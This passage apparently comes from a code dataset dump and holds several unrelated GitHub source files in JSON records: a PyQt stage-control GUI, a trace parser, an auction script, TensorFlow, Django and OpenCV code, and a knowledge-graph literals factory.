to {xHardMax}\")\n self.yOMM = QLabel(f\"{yHardMin} to {yHardMax}\")\n self.zOMM = QLabel(f\"{zHardMin} to {zHardMax}\")\n\n # Organize objective widgets in the tab layout.\n self.tab3.layout.addWidget(QLabel(\"Objective\"), 0, 2, 1, 2)\n self.tab3.layout.addWidget(QLabel(\"In, Out\"), 1, 3, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Horizontal:\"), 2, 2, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Up, Down\"), 3, 3, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Vertical:\"), 4, 2, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Upstream, Downstream\"), 5, 3, 1, 1)\n self.tab3.layout.addWidget(QLabel(\"Focus:\"), 6, 2, 1, 1)\n self.tab3.layout.addWidget(self.xOMM, 2, 3, 1, 1)\n self.tab3.layout.addWidget(self.yOMM, 4, 3, 1, 1)\n self.tab3.layout.addWidget(self.zOMM, 6, 3, 1, 1)\n\n # Set tab layout.\n self.tab3.setLayout(self.tab3.layout)\n\n # ---------------------------------------------------------------------\n # Tab 4\n # ---------------------------------------------------------------------\n\n # Define tab layout.\n self.tab4.layout = QGridLayout()\n\n # Define interactive sample widgets.\n self.xSMin = QLineEdit(macro_str(\"XSMIN_SOFT_LIMIT\"))\n self.ySMin = QLineEdit(macro_str(\"YSMIN_SOFT_LIMIT\"))\n self.zSMin = QLineEdit(macro_str(\"ZSMIN_SOFT_LIMIT\"))\n self.xSMax = QLineEdit(macro_str(\"XSMAX_SOFT_LIMIT\"))\n self.ySMax = QLineEdit(macro_str(\"YSMAX_SOFT_LIMIT\"))\n self.zSMax = QLineEdit(macro_str(\"ZSMAX_SOFT_LIMIT\"))\n\n # Organize sample widgets in the tab layout.\n self.tab4.layout.addWidget(QLabel(\"Sample\"), 0, 0, 1, 3)\n self.tab4.layout.addWidget(QLabel(\"Min\"), 1, 1, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Max\"), 1, 2, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n self.tab4.layout.addWidget(self.xSMin, 2, 1, 1, 1)\n self.tab4.layout.addWidget(self.ySMin, 3, 1, 1, 1)\n self.tab4.layout.addWidget(self.zSMin, 4, 1, 1, 1)\n self.tab4.layout.addWidget(self.xSMax, 2, 2, 1, 1)\n self.tab4.layout.addWidget(self.ySMax, 3, 2, 1, 1)\n self.tab4.layout.addWidget(self.zSMax, 4, 2, 1, 1)\n\n # Define interactive objective widgets.\n self.xOMin = QLineEdit(\n str(float(self.parent.macros[\"XOMIN_SOFT_LIMIT\"])))\n self.yOMin = QLineEdit(\n str(float(self.parent.macros[\"YOMIN_SOFT_LIMIT\"])))\n self.zOMin = QLineEdit(\n str(float(self.parent.macros[\"ZOMIN_SOFT_LIMIT\"])))\n self.xOMax = QLineEdit(\n str(float(self.parent.macros[\"XOMAX_SOFT_LIMIT\"])))\n self.yOMax = QLineEdit(\n str(float(self.parent.macros[\"YOMAX_SOFT_LIMIT\"])))\n self.zOMax = QLineEdit(\n str(float(self.parent.macros[\"ZOMAX_SOFT_LIMIT\"])))\n\n # Organize objective widgets in the tab layout.\n self.tab4.layout.addWidget(QLabel(\"Objective\"), 0, 3, 1, 3)\n self.tab4.layout.addWidget(QLabel(\"Min\"), 1, 4, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Max\"), 1, 5, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Horizontal:\"), 2, 3, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Vertical:\"), 3, 3, 1, 1)\n self.tab4.layout.addWidget(QLabel(\"Focus:\"), 4, 3, 1, 1)\n self.tab4.layout.addWidget(self.xOMin, 2, 4, 1, 1)\n self.tab4.layout.addWidget(self.yOMin, 3, 4, 1, 1)\n self.tab4.layout.addWidget(self.zOMin, 4, 4, 1, 1)\n self.tab4.layout.addWidget(self.xOMax, 2, 5, 1, 1)\n self.tab4.layout.addWidget(self.yOMax, 3, 5, 1, 1)\n self.tab4.layout.addWidget(self.zOMax, 4, 5, 1, 1)\n\n # Define, style, and organize additional interactive widgets.\n self.SSL = QPushButton(\"Set Soft Limits\")\n self.SMSL = QPushButton(\"Set Minimal Soft Limits\")\n self.SESL = QPushButton(\"Set Maximal Soft Limits\")\n self.SSL.setStyleSheet(\"background-color: lightgrey\")\n self.SMSL.setStyleSheet(\"background-color: lightgrey\")\n self.SESL.setStyleSheet(\"background-color: lightgrey\")\n self.tab4.layout.addWidget(self.SSL, 5, 0, 1, 6)\n self.tab4.layout.addWidget(self.SMSL, 6, 0, 1, 3)\n self.tab4.layout.addWidget(self.SESL, 6, 3, 1, 3)\n\n # Add information labels.\n longLabel = \"The motors will move 'backlash' steps past the low limit before moving back to the lower limit.\"\n softLimLabel = QLabel(longLabel)\n softLimLabel.setWordWrap(True)\n self.tab4.layout.addWidget(softLimLabel, 7, 0, 1, 6)\n\n # Set tab layout.\n self.tab4.setLayout(self.tab4.layout)\n\n # ---------------------------------------------------------------------\n # Tab 5\n # ---------------------------------------------------------------------\n\n # Define tab layout.\n self.tab5.layout = QGridLayout()\n\n # Define interactive sample widgets.\n self.xSOffset = QLabel(\"Offset\")\n self.ySOffset = QLabel(\"Offset\")\n self.zSOffset = QLabel(\"Offset\")\n self.xSZero = QPushButton(\"ZERO\")\n self.ySZero = QPushButton(\"ZERO\")\n self.zSZero = QPushButton(\"ZERO\")\n self.xSActual = QPushButton(\"Actual\")\n self.ySActual = QPushButton(\"Actual\")\n self.zSActual = QPushButton(\"Actual\")\n\n # Style interactive sample widgets.\n self.xSZero.setStyleSheet(\"background-color: lightgrey\")\n self.ySZero.setStyleSheet(\"background-color: lightgrey\")\n self.zSZero.setStyleSheet(\"background-color: lightgrey\")\n self.xSActual.setStyleSheet(\"background-color: lightgrey\")\n self.ySActual.setStyleSheet(\"background-color: lightgrey\")\n self.zSActual.setStyleSheet(\"background-color: lightgrey\")\n\n # Organize sample widgets in the tab layout.\n self.tab5.layout.addWidget(QLabel(\"Sample\"), 0, 0, 1, 3)\n self.tab5.layout.addWidget(QLabel(\"Offset\"), 1, 1, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n self.tab5.layout.addWidget(self.xSOffset, 2, 1, 1, 1)\n self.tab5.layout.addWidget(self.ySOffset, 3, 1, 1, 1)\n self.tab5.layout.addWidget(self.zSOffset, 4, 1, 1, 1)\n self.tab5.layout.addWidget(self.xSZero, 2, 2, 1, 1)\n self.tab5.layout.addWidget(self.ySZero, 3, 2, 1, 1)\n self.tab5.layout.addWidget(self.zSZero, 4, 2, 1, 1)\n self.tab5.layout.addWidget(self.xSActual, 2, 3, 1, 1)\n self.tab5.layout.addWidget(self.ySActual, 3, 3, 1, 1)\n self.tab5.layout.addWidget(self.zSActual, 4, 3, 1, 1)\n\n # Define interactive objective widgets.\n self.xOOffset = QLabel(\"Offset\")\n self.yOOffset = QLabel(\"Offset\")\n self.zOOffset = QLabel(\"Offset\")\n self.xOZero = QPushButton(\"ZERO\")\n self.yOZero = QPushButton(\"ZERO\")\n self.zOZero = QPushButton(\"ZERO\")\n self.xOActual = QPushButton(\"Actual\")\n self.yOActual = QPushButton(\"Actual\")\n self.zOActual = QPushButton(\"Actual\")\n\n # Style interactive sample widgets.\n self.xOZero.setStyleSheet(\"background-color: lightgrey\")\n self.yOZero.setStyleSheet(\"background-color: lightgrey\")\n self.zOZero.setStyleSheet(\"background-color: lightgrey\")\n self.xOActual.setStyleSheet(\"background-color: lightgrey\")\n self.yOActual.setStyleSheet(\"background-color: lightgrey\")\n self.zOActual.setStyleSheet(\"background-color: lightgrey\")\n\n # Organize sample widgets in the tab layout.\n self.tab5.layout.addWidget(QLabel(\"Objective\"), 0, 4, 1, 3)\n self.tab5.layout.addWidget(QLabel(\"Offset\"), 1, 5, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Horizontal:\"), 2, 4, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Vertical:\"), 3, 4, 1, 1)\n self.tab5.layout.addWidget(QLabel(\"Focus:\"), 4, 4, 1, 1)\n self.tab5.layout.addWidget(self.xOOffset, 2, 5, 1, 1)\n self.tab5.layout.addWidget(self.yOOffset, 3, 5, 1, 1)\n self.tab5.layout.addWidget(self.zOOffset, 4, 5, 1, 1)\n self.tab5.layout.addWidget(self.xOZero, 2, 6, 1, 1)\n self.tab5.layout.addWidget(self.yOZero, 3, 6, 1, 1)\n self.tab5.layout.addWidget(self.zOZero, 4, 6, 1, 1)\n self.tab5.layout.addWidget(self.xOActual, 2, 7, 1, 1)\n self.tab5.layout.addWidget(self.yOActual, 3, 7, 1, 1)\n self.tab5.layout.addWidget(self.zOActual, 4, 7, 1, 1)\n\n self.zeroAll = QPushButton(\"Zero All Stages\")\n self.zeroAll.setStyleSheet(\"background-color: lightgrey\")\n self.tab5.layout.addWidget(self.zeroAll, 5, 0, 1, 4)\n\n self.allActual = QPushButton(\"Display All Actual Values\")\n self.allActual.setStyleSheet(\"background-color: lightgrey\")\n self.tab5.layout.addWidget(self.allActual, 5, 4, 1, 4)\n\n # Add information labels.\n zeroLabel = QLabel(\"Cannot zero when displaying actual values.\")\n zeroLabel.setWordWrap(True)\n self.tab5.layout.addWidget(zeroLabel, 7, 0, 1, 4)\n\n # Set tab layout.\n self.tab5.setLayout(self.tab5.layout)\n\n # ---------------------------------------------------------------------\n # Tab 6\n # ---------------------------------------------------------------------\n\n self.tab6.layout = QGridLayout()\n\n # Define interactive sample widgets.\n self.xSB = QLineEdit(macro_str(\"XS_BACKLASH\"))\n self.ySB = QLineEdit(macro_str(\"YS_BACKLASH\"))\n self.zSB = QLineEdit(macro_str(\"ZS_BACKLASH\"))\n\n # Organize sample widgets in the tab layout.\n self.tab6.layout.addWidget(QLabel(\"Sample\"), 0, 0, 1, 3)\n self.tab6.layout.addWidget(QLabel(\"Backlash\"), 1, 1, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Horizontal:\"), 2, 0, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Vertical:\"), 3, 0, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Focus:\"), 4, 0, 1, 1)\n self.tab6.layout.addWidget(self.xSB, 2, 1, 1, 1)\n self.tab6.layout.addWidget(self.ySB, 3, 1, 1, 1)\n self.tab6.layout.addWidget(self.zSB, 4, 1, 1, 1)\n\n # Define interactive objective widgets.\n self.xOB = QLineEdit(macro_str(\"XO_BACKLASH\"))\n self.yOB = QLineEdit(macro_str(\"YO_BACKLASH\"))\n self.zOB = QLineEdit(macro_str(\"ZO_BACKLASH\"))\n\n # Organize objective widgets in the tab layout.\n self.tab6.layout.addWidget(QLabel(\"Objective\"), 0, 2, 1, 3)\n self.tab6.layout.addWidget(QLabel(\"Backlash\"), 1, 3, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Horizontal:\"), 2, 2, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Vertical:\"), 3, 2, 1, 1)\n self.tab6.layout.addWidget(QLabel(\"Focus:\"), 4, 2, 1, 1)\n self.tab6.layout.addWidget(self.xOB, 2, 3, 1, 1)\n self.tab6.layout.addWidget(self.yOB, 3, 3, 1, 1)\n self.tab6.layout.addWidget(self.zOB, 4, 3, 1, 1)\n\n # Define, style, and organize additional interactive widgets.\n self.SBL = QPushButton(\"Update Backlash Values\")\n self.SBL.setStyleSheet(\"background-color: lightgrey\")\n self.tab6.layout.addWidget(self.SBL, 5, 0, 1, 4)\n\n # Add information labels.\n longLabel = \"Backlash is applied when moving negitively. The motor will move 'backlash' steps past the target position before returning to the target position\"\n backlashLabel = QLabel(longLabel)\n backlashLabel.setWordWrap(True)\n self.tab6.layout.addWidget(backlashLabel, 6, 0, 1, 4)\n\n self.tab6.setLayout(self.tab6.layout)\n\n # Set window layout.\n self.layout.addWidget(self.tabs)\n self.setLayout(self.layout)\n","repo_name":"JaiWillems/MicroGUI","sub_path":"microgui/source/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":54800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35060581659","text":"from conf import parser_conf as conf\nfrom time import sleep, time\nfrom tqdm import tqdm\n\nfrom forwarder import Request\n\n\nclass Parser:\n def __init__(self, file_path=conf.traceFilePath):\n with tqdm(total=4, desc='parsing trace file') as tq:\n trace = open(file_path).read().split(\"\\n\")\n tq.update()\n trace = list(map(lambda q: q.split(conf.traceDil), trace))\n tq.update()\n trace = [e for e in trace if len(e) == conf.indicesCnt]\n tq.update()\n\n self.requests = list(map(\n lambda q: [(float(q[conf.timeInd])-float(trace[0][conf.timeInd]))*conf.delayFactor,\n q[conf.RWInd], int(q[conf.addrInd]), int(q[conf.sizeInd])],\n trace))\n tq.update()\n self.cnt = len(self.requests)\n tq.close()\n self.currentRequest = 0\n\n def start_sending_requests(self, dest):\n start = time()\n for req in self.requests:\n while time() - start < req[0]:\n sleep(2/1000000)\n if req[1] == 'W':\n dest(Request(conf.storageDevice, req[1], req[2] % conf.storageCapacity, data=b'\\x12' * req[3]))\n else:\n dest(Request(conf.storageDevice, req[1], req[2] % conf.storageCapacity, length=req[3]))\n self.currentRequest += 1\n","repo_name":"abdijavad110/cache_implementation","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40695736223","text":"from replit import clear\n#HINT: You can call clear() to clear the output in the console.\nfrom art import logo\n\nbidder_list = {}\nshould_end = False\nwinner_list = []\n\ndef bidding_list(bidder_name, bidder_bid):\n bidder_list[bidder_name] = bidder_bid\n # bidder_list.append(bid_data)\n # print(bidder_list)\n\n#find the highest bidder\n\ndef highest_bidder(bidder_list):\n highest_bid = 0\n name = \"\"\n for key in bidder_list:\n # print(key)\n bid = bidder_list[key]\n if bid > highest_bid:\n highest_bid = bid\n name = key\n # print(highest_bid)\n winner_list.append(name)\n winner_list.append(highest_bid)\n \nprint(logo)\nprint(\"Welcome to the secret auction program.\")\n\nwhile not should_end:\n name = input(\"What is your name?: \")\n bid = int(input(\"what's your bid?: $\"))\n \n bidding_list(bidder_name=name, bidder_bid=bid)\n \n loop = input(\"Are there any other bidders? Type 'yes' or 'no': \")\n clear()\n if loop == \"no\":\n should_end = True\n highest_bidder(bidder_list)\n # print(winner_list)\n print(f\"The winner is {winner_list[0]} with a bid of ${winner_list[1]}.\")\n\n \n","repo_name":"sreuben04/secret-auction-bidding","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7015090799","text":"import numpy as np\nimport tensorflow as tf\nfrom CisPValCalculationModel import CisPValCalculator\nfrom TransPValCalculationModel import TransPValCalculator\n\n\nclass TrainingInteractionsSeparator:\n\n def __init__(self, objs_holder, itype, pval_limit, silent_mode):\n \n self.itype = itype\n \n self.ints = objs_holder.tf_ints[itype]\n self.on_mask = objs_holder.tf_ints_on_mask[itype]\n\n # ranges also need to be modified\n self.sig_end = objs_holder.ints_sig_end[itype]\n self.training_end = objs_holder.ints_training_end[itype]\n\n self.silent_mode = silent_mode\n self.limit = np.log(pval_limit)\n self.sess = objs_holder.sess\n\n if itype.startswith('c'):\n self.pval_calculator = CisPValCalculator(objs_holder, itype)\n else:\n self.pval_calculator = TransPValCalculator(objs_holder, itype)\n\n # ASSIGNMENTS\n\n self.ints_assign = None\n self.on_mask_assign = None\n\n # ranges also need to be modified\n self.sig_end_assign = None\n self.training_end_assign = None\n\n self.on_sig_percentage = None\n self.off_sig_percentage = None\n \n self.define_separation_model()\n\n def define_separation_model(self):\n\n log_pvals = self.pval_calculator.run_model(self.ints)\n\n # significant masks\n sig_masks = tf.less_equal(log_pvals, self.limit)\n\n # now finding new ranges! SIG-ON, SIG-OFF, INSIG-ON, NOISE-ON, INSIG-OFF\n all_indices = tf.range(tf.shape(self.ints)[0])\n\n sig_on_mask = tf.logical_and(sig_masks, self.on_mask)\n sig_off_mask = tf.logical_and(sig_masks, tf.logical_not(self.on_mask))\n insig_on_mask = tf.logical_and(tf.logical_not(sig_masks), self.on_mask)\n insig_off_mask = tf.logical_and(tf.logical_not(sig_masks), tf.logical_not(self.on_mask))\n\n sig_on_mask.set_shape([None])\n sig_off_mask.set_shape([None])\n insig_on_mask.set_shape([None])\n insig_off_mask.set_shape([None])\n\n sig_on = tf.boolean_mask(all_indices, sig_on_mask)\n sig_off = tf.boolean_mask(all_indices, sig_off_mask)\n insig_on = tf.boolean_mask(all_indices, insig_on_mask)\n insig_off = tf.boolean_mask(all_indices, insig_off_mask)\n\n new_order = tf.concat([sig_on, sig_off, insig_on, insig_off], axis=0)\n \n # assignments\n self.ints_assign = tf.assign(self.ints, tf.gather(self.ints, new_order))\n self.on_mask_assign = tf.assign(self.on_mask, tf.gather(self.on_mask, new_order))\n \n self.sig_end_assign = tf.assign(self.sig_end, tf.shape(sig_on)[0] + tf.shape(sig_off)[0])\n self.training_end_assign = tf.assign(self.training_end, \n tf.shape(sig_on)[0] + tf.shape(sig_off)[0] + tf.shape(insig_on)[0])\n\n self.on_sig_percentage = tf.cast(tf.shape(sig_on)[0], tf.float64) / \\\n tf.cast(tf.maximum(1, tf.shape(sig_on)[0] + tf.shape(insig_on)[0]), tf.float64)\n self.off_sig_percentage = tf.cast(tf.shape(sig_off)[0], tf.float64) / \\\n tf.cast(tf.maximum(1, tf.shape(sig_off)[0] + tf.shape(insig_off)[0]), tf.float64)\n\n def separate_training_interactions(self):\n\n # IN RANGE INTS\n _, _, _, _, sig_on_per, sig_off_per = self.sess.run([\n self.ints_assign, self.on_mask_assign, self.sig_end_assign, self.training_end_assign,\n self.on_sig_percentage, self.off_sig_percentage])\n\n # finding the percent of unreals for debugging\n if not self.silent_mode:\n print('~~~~~~~')\n print('Percent of sig interactions for %s:' % self.itype)\n print('On: %.4f' % sig_on_per)\n print('Off: %.4f' % sig_off_per)\n print('~~~~~~~')\n","repo_name":"bcb-sut/MaxHiC","sub_path":"Capture/TrainingInteractionsSeparatorModel.py","file_name":"TrainingInteractionsSeparatorModel.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13379760009","text":"from ..component import Component\n\nclass gallery(Component):\n def __init__(self, instance_id=\"\", galleryname=\"\", photos=[]):\n Component.__init__(self, \"Gallery\")\n self.instance_id = instance_id\n self.name = galleryname\n self.photos = photos\n self.currentPhoto = 0\n \n def setName(self,name):\n \"\"\"Sets name of the gallery\"\"\"\n self.name = name\n def getName(self):\n \"\"\"Gets name of the gallery\"\"\"\n return self.name\n def addPhoto(self,photoLink):\n \"\"\"Adds given photo to the gallery\"\"\"\n self.photos.append(photoLink)\n def removePhoto(self,photoLink):\n \"\"\"Removes given photo from the gallery if it is there\"\"\"\n try:\n self.photos.remove(photoLink)\n except:\n pass\n def nextPhoto(self):\n if (len(self.photos) == 0):\n return \"

No added photos

\"\n elif (self.currentPhoto == len(self.photos) - 1):\n self.currentPhoto = 0\n return self.photos[self.currentPhoto]\n else:\n self.currentPhoto += 1\n return self.photos[self.currentPhoto]\n \n def prevPhoto(self):\n if (len(self.photos) == 0):\n return \"

No added photos

\"\n elif (self.currentPhoto == 0):\n self.currentPhoto = len(self.photos) - 1 # covers the case when there is only one photo\n return self.photos[self.currentPhoto]\n else:\n self.currentPhoto -= 1\n return self.photos[self.currentPhoto]\n \n def execute(self):\n result = \"

\"\n result += '

Gallery: {}

'.format(self.getName())\n if (len(self.photos) == 0):\n result+= \"

No added photos


\"\n return result\n result += '''
\"Pic'''\n result += '
'.format(self.instance_id)\n result += '
'.format(self.instance_id)\n result += \"

\"\n return result","repo_name":"berkyasr/WebDashboard","sub_path":"WebDashboard/wd/components/gallery.py","file_name":"gallery.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3659574041","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport operator\n\n\nimg_l = cv2.imread('../../images/task_3_and_4/left_0.png')\nimg_r = cv2.imread('../../images/task_3_and_4/right_0.png')\n\nimages = []\nimages.append(img_l)\nimages.append(img_r)\ngray_l = cv2.cvtColor(img_l, cv2.COLOR_BGR2GRAY)\ngray_r = cv2.cvtColor(img_r, cv2.COLOR_BGR2GRAY)\n\nfs_l = cv2.FileStorage(\"../../parameters/left_camera_intrinsics.xml\", cv2.FILE_STORAGE_READ)\ncameraMatrix_l = fs_l.getNode(\"camera_intrinsic\")\n#print(cameraMatrix_l.mat())\ndistMatrix_l = fs_l.getNode(\"distort_coefficients\")\n\nfs_r = cv2.FileStorage(\"../../parameters/right_camera_intrinsics.xml\", cv2.FILE_STORAGE_READ)\ncameraMatrix_r = fs_r.getNode(\"camera_intrinsic\")\ndistMatrix_r = fs_r.getNode(\"distort_coefficients\")\n\nfs_projection = cv2.FileStorage(\"../../parameters/stereo_rectification.xml\", cv2.FILE_STORAGE_READ)\nprojMtx1 = fs_projection.getNode(\"rectified_projection_matrix_1\")\nprojMtx2 = fs_projection.getNode(\"rectified_projection_matrix_2\")\n\n\n# Undistort left image\nh, w = img_l.shape[:2]\nnewcameramtx, roi = cv2.getOptimalNewCameraMatrix(cameraMatrix_l.mat(), distMatrix_l.mat(), (w, h), 1, (w, h))\nmapx, mapy = cv2.initUndistortRectifyMap(cameraMatrix_l.mat(), distMatrix_l.mat(), None, newcameramtx, (w, h), 5)\ndst = cv2.remap(img_l, mapx, mapy, cv2.INTER_LINEAR)\nx, y, w, h = roi\ndst = dst[y:y + h, x:x + w]\ncv2.imwrite(r'../../output/task_3/l_distort.png', dst)\n\n# Undistort right image\nh, w = img_r.shape[:2]\nnewcameramtx, roi = cv2.getOptimalNewCameraMatrix(cameraMatrix_r.mat(), distMatrix_r.mat(), (w, h), 1, (w, h))\nmapx, mapy = cv2.initUndistortRectifyMap(cameraMatrix_r.mat(), distMatrix_r.mat(), None, newcameramtx, (w, h), 5)\ndst = cv2.remap(img_l, mapx, mapy, cv2.INTER_LINEAR)\nx, y, w, h = roi\ndst = dst[y:y + h, x:x + w]\ncv2.imwrite(r'../../output/task_3/r_distort.png', dst)\n\n\n#ORB\norb = cv2.ORB_create()\nkp_l = orb.detect(gray_l, None)\nimg2_l = cv2.drawKeypoints(gray_l, kp_l, None, color=(0,255,0), flags=0)\nplt.imsave(\"../../output/task_3/l_key_points.png\", img2_l)\n\nkp_r = orb.detect(gray_r, None)\nimg2_r = cv2.drawKeypoints(gray_r, kp_r, None, color=(0,255,0), flags=0)\nplt.imsave(\"../../output/task_3/r_key_points.png\", img2_r)\n\n# left keypoints\nkeypoint_list_l = []\nfor i, keypoint in enumerate(kp_l):\n #print(\"Keypoint:\", i, keypoint)\n keypoint_list_l.append(keypoint)\n\n# sort by response\ncmpfun = operator.attrgetter('response')\nkeypoint_list_l.sort(key=cmpfun, reverse=True)\n\n# find minimum\ndistance = []\nradius_l = []\nkeypoint_i = 0\nfor keypoint in keypoint_list_l:\n # print(\"Keypoint:\", keypoint.response)\n distance.append([])\n if keypoint_i == 0:\n distance[0].append(1)\n for index in range(keypoint_i):\n distance[keypoint_i].append(np.linalg.norm(np.array(keypoint.pt) - np.array(keypoint_list_l[index].pt)))\n radius_l.append(min(distance[keypoint_i]))\n # print(keypoint_i, \" radius_l:\", radius_l[keypoint_i])\n keypoint_i = keypoint_i + 1\n\n# right keypoints\nkeypoint_list_r = []\nfor i, keypoint in enumerate(kp_r):\n keypoint_list_r.append(keypoint)\n\n# sort by response\nkeypoint_list_r.sort(key=cmpfun, reverse=True)\n\n# find minimum\ndistance = []\nradius_r = []\nkeypoint_i = 0\nfor keypoint in keypoint_list_r:\n # print(\"Keypoint:\", keypoint.response)\n distance.append([])\n if keypoint_i == 0:\n distance[0].append(1)\n for index in range(keypoint_i):\n distance[keypoint_i].append(np.linalg.norm(np.array(keypoint.pt) - np.array(keypoint_list_r[index].pt)))\n radius_r.append(min(distance[keypoint_i]))\n # print(keypoint_i, \" radius_r:\", radius_r[keypoint_i])\n keypoint_i = keypoint_i + 1\n\n# sort by suppression radius\nkeypoint_list_l = np.c_[keypoint_list_l, radius_l]\nkeypoint_list_l = sorted(keypoint_list_l, key=lambda x:x[1], reverse=True)\n\nkeypoint_list_r = np.c_[keypoint_list_r, radius_r]\nkeypoint_list_r = sorted(keypoint_list_r, key=lambda x:x[1], reverse=True)\n\n# get top n = 10\nkeypoint_list_l = keypoint_list_l[0:20]\nkeypoint_list_l = np.delete(keypoint_list_l, 1, axis=1).transpose()[0]\n\nkeypoint_list_r = keypoint_list_r[0:20]\nkeypoint_list_r = np.delete(keypoint_list_r, 1, axis=1).transpose()[0]\n\nimg3_l = cv2.drawKeypoints(gray_l, keypoint_list_l, None, color=(0,255,0), flags=0)\nimg3_r = cv2.drawKeypoints(gray_r, keypoint_list_r, None, color=(0,255,0), flags=0)\nplt.imsave(\"../../output/task_3/l_suppressed_key_points.png\", img3_l)\nplt.imsave(\"../../output/task_3/r_suppressed_key_points.png\", img3_r)\n#print(keypoint_list)\n#print(kp_l)\n\n\n# step 3: Match features\nkeypoint_list_l, des_l = orb.compute(gray_l, keypoint_list_l)\nkeypoint_list_r, des_r = orb.compute(gray_r, keypoint_list_r)\nmatcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\nmatches = matcher.match(des_l, des_r)\nimg4 = cv2.drawMatches(gray_l, keypoint_list_l, gray_r, keypoint_list_r, matches, img_l)\nplt.imsave(\"../../output/task_3/matches.png\", img4),plt.show()\n\n# step 4: Triangulate Points\ntwoDPoint_l = []\ntwoDPoint_r = []\nfor keypoint in keypoint_list_l:\n twoDPoint_l.append(keypoint.pt)\nfor keypoint in keypoint_list_r:\n twoDPoint_r.append(keypoint.pt)\ntwoDPoint_l = np.array(twoDPoint_l)\ntwoDPoint_r = np.array(twoDPoint_r)\nundist_l = cv2.undistortPoints(twoDPoint_l, cameraMatrix_l.mat(), distMatrix_l.mat())\nundist_r = cv2.undistortPoints(twoDPoint_r, cameraMatrix_r.mat(), distMatrix_r.mat())\npoints4D = cv2.triangulatePoints(projMtx1.mat(), projMtx2.mat(), undist_l, undist_r)\npoints4D = [c / points4D[3] for c in points4D]\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nAxes3D.scatter(ax, points4D[0], points4D[1], points4D[2])\nplt.savefig(\"../../output/task_3/3D_features.png\")\n# print(points4D)\n","repo_name":"Sambour/Camera-Model-and-Stereo-Depth-Sensing","sub_path":"code/task_3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9177011520","text":"from django.urls import path\r\nfrom .views import bajarildi, delete, edit, todo\r\nfrom .api_views import IshListView, IshDetailView\r\n\r\nurlpatterns = [\r\n path('', todo, name='home'),\r\n path('/delete/', delete,name=\"delete\"),\r\n path('/bajarildi/', bajarildi,name=\"bajarildi\"),\r\n path('/edit/', edit,name=\"edit\"),\r\n path('api/v1/', IshListView.as_view()),\r\n path('api/v1//', IshDetailView.as_view()),\r\n]","repo_name":"Azizbekbackend/Todo","sub_path":"todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15884620759","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Implementation of factory that create instances containing of triples and numeric literals.tsv.\"\"\"\n\nfrom typing import Tuple\n\nimport numpy as np\nfrom typing import Dict\nfrom poem.constants import PATH_TO_NUMERIC_LITERALS, NUMERIC_LITERALS\nfrom poem.instance_creation_factories.instances import MultimodalOWAInstances, \\\n MultimodalCWAInstances\nfrom poem.instance_creation_factories.triples_factory import TriplesFactory\nfrom poem.preprocessing.numeric_literals_preprocessing_utils.basic_utils import create_matix_of_literals\n\n\nclass TriplesNumericLiteralsFactory(TriplesFactory):\n \"\"\".\"\"\"\n\n def __init__(self, entity_to_id, relation_to_id, numeric_triples):\n super().__init__(entity_to_id, relation_to_id)\n self.literals_to_id = None\n self.numeric_triples = numeric_triples\n self.numeric_literals = None\n self.multimodal_data = None\n\n def _create_numeric_literals(self) -> None:\n \"\"\"\"\"\"\n self.numeric_literals, self.literals_to_id = create_matix_of_literals(numeric_triples=self.numeric_triples,\n entity_to_id=self.entity_to_id)\n self.multimodal_data = {\n NUMERIC_LITERALS: self.numeric_literals\n }\n\n def create_owa_instances(self, triples) -> MultimodalOWAInstances:\n \"\"\"\"\"\"\n owa_instances = super().create_owa_instances(triples=triples)\n\n if self.multimodal_data is None:\n self._create_numeric_literals()\n\n return MultimodalOWAInstances(instances=owa_instances.instances,\n entity_to_id=owa_instances.entity_to_id,\n relation_to_id=owa_instances.relation_to_id,\n kg_assumption=owa_instances.kg_assumption,\n multimodal_data=self.multimodal_data)\n\n def create_cwa_instances(self, triples) -> MultimodalCWAInstances:\n \"\"\".\"\"\"\n cwa_instances = 